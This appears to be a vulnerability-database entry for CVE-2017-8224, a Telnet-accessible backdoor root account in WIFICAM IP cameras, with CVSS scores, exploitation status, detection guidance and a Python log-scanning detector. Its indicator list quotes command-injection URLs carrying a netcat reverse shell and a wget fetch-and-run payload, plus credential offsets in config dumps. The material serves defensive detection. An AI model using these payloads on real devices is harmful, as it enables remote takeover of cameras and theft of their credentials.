CVE-2017-8224
published 2017-04-25

CVE-2017-8224: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.

Priority: P1 80 critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploitation: ITW exploit; VulnCheck KEV; exploited in the wild
EPSS: 8.58% (94.4th percentile)

Detection & IOCs (extracted from sources)

URLs:
  /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
  /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
  /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
  /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0
Command:
  nc 192.168.1.1 1337 -e /bin/sh
Bytes:
  0x0a 0x0a 0x0a 0x0a 0x01
  • Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi containing shell metacharacters (e.g., $(), nc, wget) in the `pwd` parameter — this is the command injection vector for RCE.
  • Detect inbound Telnet connections to the device — the backdoor root account is accessible via Telnet.
  • In captured binary config dumps from the device, credentials are located at offset +138 (username) and +170 (password) bytes after the 4-byte 0x0a sequence followed by 0x01; the default username is 'admin'.
  • The exploit targets port 80 (CAM_PORT) by default; the camera's web interface may be hosted on a non-standard port in some deployments, requiring port-agnostic detection on the CGI paths.
  • The connect-back shell uses a hardcoded attacker IP (REMOTE_HOST 192.168.1.1) and port (REMOTE_PORT 1337) in the PoC; real-world attacks will substitute arbitrary attacker-controlled values in the `pwd` parameter.
  • Two alternative payload forms exist for the injection: URL-encoded spaces (%20) and plus-sign-encoded spaces (+) — detection signatures must account for both encoding variants.
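A defender-side check for the first and last bullets above, as an added example that is not from this page or any vendor: it parses constructed access-log lines, normalises both the %20 and + space encodings, and flags requests to the two CGI paths whose `pwd` parameter carries shell metacharacters. The combined log format, the sample lines and the indicator list are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# CGI endpoints the page names as the command-injection vector.
SUSPECT_PATHS = {"/set_ftp.cgi", "/ftptest.cgi"}
# Shell metacharacters and tool names worth flagging inside the injected parameter (assumed list).
SHELL_PATTERN = re.compile(r"\$\(|`|;|\||\bnc\b|\bwget\b|/bin/sh")
REQUEST_RE = re.compile(r'"GET (\S+) HTTP/1\.[01]"')
PWD_RE = re.compile(r"(?:^|&)pwd=([^&]*)")

def analyse_request(line):
    """Inspect one access-log line; return a finding dict, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if parts.path not in SUSPECT_PATHS:
        return None
    raw = PWD_RE.search(parts.query)
    # unquote_plus turns both %20 and '+' into a space, so one rule covers
    # the two encoding variants listed above.
    pwd = unquote_plus(raw.group(1)) if raw else ""
    hits = set(SHELL_PATTERN.findall(pwd))
    # A bare '&&' in the query string cuts the pwd value short; flag it as well.
    if "&&" in parts.query:
        hits.add("&&")
    if not hits:
        return None
    return {"client": line.split(" ", 1)[0], "path": parts.path,
            "pwd": pwd, "indicators": sorted(hits)}

def scan_log(lines):
    """Run analyse_request over an iterable of log lines and collect the findings."""
    return [f for f in map(analyse_request, lines) if f]

# Constructed sample access log (combined format); not captured from a real device.
SAMPLE_LOG = [
    '10.0.0.7 - - [25/Apr/2017:10:00:01 +0000] "GET /index.htm HTTP/1.1" 200 1024',
    '10.0.0.7 - - [25/Apr/2017:10:00:02 +0000] "GET /set_ftp.cgi?next_url=ftp.htm'
    '&loginuse=admin&loginpas=x&svr=10.0.0.5&port=21&user=ftp&pwd=Secret123'
    '&dir=/&mode=PORT&upload_interval=0 HTTP/1.1" 200 512',
    '192.168.1.1 - - [25/Apr/2017:10:00:03 +0000] "GET /set_ftp.cgi?next_url=ftp.htm'
    '&loginuse=admin&loginpas=x&svr=192.168.1.1&port=21&user=ftp'
    '&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0'
    ' HTTP/1.1" 200 512',
    '192.168.1.1 - - [25/Apr/2017:10:00:04 +0000] "GET /set_ftp.cgi?next_url=ftp.htm'
    '&loginuse=admin&loginpas=x&svr=192.168.1.1&port=21&user=ftp'
    '&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0'
    ' HTTP/1.1" 200 512',
]
```

`scan_log(SAMPLE_LOG)` returns two findings (the nc and wget requests) and ignores the legitimate FTP configuration request, because the check keys on metacharacters in the decoded value rather than on the path alone.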

CVSS provenance

  • NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • NVD, CVSS v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
  • VulnCheck: 9.8 CRITICAL